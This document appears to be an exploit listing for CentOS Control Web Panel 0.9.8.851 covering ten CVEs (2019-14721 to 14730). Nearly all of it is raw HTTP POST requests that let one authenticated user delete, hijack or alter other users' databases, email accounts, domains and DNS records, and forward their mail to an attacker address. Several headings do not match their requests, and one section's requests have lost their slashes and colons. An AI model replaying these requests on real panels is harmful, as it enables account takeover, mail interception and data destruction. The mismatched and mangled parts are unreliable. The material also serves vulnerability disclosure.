Exploit for Control Web Panel 0.9.8.851 Privilege Escalation CVE-2019-14722 CVE-2019-14724 CVE-2019-14730 CVE-2019-14728 CVE-2019-14729 CVE-2019-14726 CVE-2019-14725 CVE-2019-14723 CVE-2019-14721 CVE-2019-14727

Name: Exploit for Control Web Panel 0.9.8.851 Privilege Escalation CVE-2019-14722 CVE-2019-14724 CVE-2019-14730 CVE-2019-14728 CVE-2019-14729 CVE-2019-14726 CVE-2019-14725 CVE-2019-14723 CVE-2019-14721 CVE-2019-14727
Rating: 5 (229 reviews)
2019-09-09 | CVSS 0.8
## https://sploitus.com/exploit?id=PACKETSTORM:154404
CVE Number : CVE-2019-14721, CVE-2019-14722, CVE-2019-14723, CVE-2019-14724, CVE-2019-14725, CVE-2019-14726, CVE-2019-14727, CVE-2019-14728, CVE-2019-14729, CVE-2019-14730  
  
Date : 24 Jul 2019  
Exploit Author : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak  
Vendor Homepage : https://control-webpanel.com/  
Software Link : Not available, user panel only available for lastest version  
Product Name : CWP (CentOS Control Web Panel)   
Version : 0.9.8.851  
Tested on : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)  
Reference : https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE  
Attack Requirement : Authenticated User  
  
-------------------------------------------------------------------------------------------------------------  
CVE-2019-14721 : CWP (CentOS Control Web Panel 0.9.8.851) Remove user from phpMyAdmin via an attacker account  
-------------------------------------------------------------------------------------------------------------  
  
POST /cwp_47e1d536a096e42d/alice/alice/index.php?module=mysql_manager&acc=deleteuserdb HTTP/1.1  
Host: 192.168.80.148:2083  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430  
X-Requested-With: XMLHttpRequest  
Content-Length: 31  
Connection: close  
Referer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=mysql_manager  
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2  
  
user=<TARGET-USER>&host=localhost  
  
-------------------------------------------------------------------------------------------------------------  
CVE-2019-14722 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other mail forwarder  
-------------------------------------------------------------------------------------------------------------  
  
POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=forwardelete HTTP/1.1  
Host: 192.168.80.148:2083  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430  
X-Requested-With: XMLHttpRequest  
Content-Length: 7  
Connection: close  
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts  
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2  
  
email=<TARGET-EMAIL>  
  
-------------------------------------------------------------------------------------------------------------  
CVE-2019-14723 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other email account  
-------------------------------------------------------------------------------------------------------------  
  
POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=emaildelete HTTP/1.1  
Host: 192.168.80.148:2083  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430  
X-Requested-With: XMLHttpRequest  
Content-Length: 21  
Connection: close  
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts  
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2  
  
email=<TARGET-EMAIL>  
  
-------------------------------------------------------------------------------------------------------------  
CVE-2019-14724 : CWP (CentOS Control Web Panel 0.9.8.851) Access Other DNS and Delete  
-------------------------------------------------------------------------------------------------------------  
  
POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=updateforwarders HTTP/1.1  
Host: 192.168.80.148:2083  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430  
X-Requested-With: XMLHttpRequest  
Content-Length: 14  
Connection: close  
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts  
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2  
  
email=bob2@bob2&goto=attacker@attacker.com  
  
-------------------------------------------------------------------------------------------------------------  
CVE-2019-14725 : CWP (CentOS Control Web Panel 0.9.8.851) Remove user from phpMyAdmin via an attacker account  
-------------------------------------------------------------------------------------------------------------  
  
POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=updquotaemail HTTP/1.1  
Host: 192.168.80.148:2083  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430  
X-Requested-With: XMLHttpRequest  
Content-Length: 38  
Connection: close  
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts  
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2  
  
email=<TARGET-EMAIL>&quota=1048576000  
  
-------------------------------------------------------------------------------------------------------------  
CVE-2019-14726 : CWP (CentOS Control Web Panel 0.9.8.851) Modify forward mail destination on victim's account  
-------------------------------------------------------------------------------------------------------------  
  
# Access  
  
POST cwp_b99b38b4d4ced310alicealiceindex.phpmodule=dns_zone_editor&acc=paserrecord HTTP1.1  
Host 192.168.80.1482083  
User-Agent Mozilla5.0 (Windows NT 10.0; Win64; x64; rv68.0) Gecko20100101 Firefox68.0  
Accept   
Accept-Language en-US,en;q=0.5  
Accept-Encoding gzip, deflate  
Content-Type applicationx-www-form-urlencoded; charset=UTF-8  
csrftoken 9a1f7869d43544fc9f509cb6ac7bf430  
X-Requested-With XMLHttpRequest  
Content-Length 16  
Connection close  
Referer https192.168.80.1482083cwp_b99b38b4d4ced310alicemodule=dns_zone_editor  
Cookie PHPSESSID=i2is5am08ru7a2h93e13llp9e2  
  
domain=bob.com  
  
-------------------------------------------------------------------------------  
  
# Delete  
  
POST cwp_b99b38b4d4ced310alicealiceindex.phpmodule=dns_zone_editor&acc=addregdns HTTP1.1  
Host 192.168.80.1482083  
User-Agent Mozilla5.0 (Windows NT 10.0; Win64; x64; rv68.0) Gecko20100101 Firefox68.0  
Accept   
Accept-Language en-US,en;q=0.5  
Accept-Encoding gzip, deflate  
Content-Type applicationx-www-form-urlencoded; charset=UTF-8  
csrftoken 9a1f7869d43544fc9f509cb6ac7bf430  
X-Requested-With XMLHttpRequest  
Content-Length 111  
Connection close  
Referer https192.168.80.1482083cwp_b99b38b4d4ced310alicemodule=dns_zone_editor  
Cookie PHPSESSID=i2is5am08ru7a2h93e13llp9e2  
  
domain=bob.com&namereg=Attacker.com&valuereg=192.168.10.200&cachereg=14400&reg=A&flag=undefined&tag=undefined  
  
-------------------------------------------------------------------------------------------------------------  
CVE-2019-14727 : CWP (CentOS Control Web Panel 0.9.8.851) Change other email password  
-------------------------------------------------------------------------------------------------------------  
  
POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=changpassemail HTTP/1.1  
Host: 192.168.80.148:2083  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430  
X-Requested-With: XMLHttpRequest  
Content-Length: 45  
Connection: close  
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts  
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2  
  
email=<TARGET-EMAIL>&pass1email=P@ssw0rd  
  
-------------------------------------------------------------------------------------------------------------  
CVE-2019-14728 : CWP (CentOS Control Web Panel 0.9.8.851) Add forward mail to other account  
-------------------------------------------------------------------------------------------------------------  
  
POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=addforwar HTTP/1.1  
Host: 192.168.80.148:2083  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430  
X-Requested-With: XMLHttpRequest  
Content-Length: 73  
Connection: close  
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts  
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2  
  
forwaraddres=bob2&domainforwar=bob2&forwarders=attacker@attacker.com  
  
-------------------------------------------------------------------------------------------------------------  
CVE-2019-14729 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other sub-domain  
-------------------------------------------------------------------------------------------------------------  
  
POST /cwp_47e1d536a096e42d/alice/alice/index.php?module=subdomains&acc=subdomaindelete HTTP/1.1  
Host: 192.168.80.148:2083  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430  
X-Requested-With: XMLHttpRequest  
Content-Length: 32  
Connection: close  
Referer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=subdomains  
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2  
  
domain=<TARGET-DOMAIN>&subdomain=<TARGET-SUBDOMAIN>  
  
-------------------------------------------------------------------------------------------------------------  
CVE-2019-14730 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other domain  
-------------------------------------------------------------------------------------------------------------  
  
POST /cwp_47e1d536a096e42d/alice/alice/index.php?module=domains&acc=verifsubdomain HTTP/1.1  
Host: 192.168.80.148:2083  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430  
X-Requested-With: XMLHttpRequest  
Content-Length: 12  
Connection: close  
Referer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=domains  
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2  
  
domain=<TARGET-DOMAIN>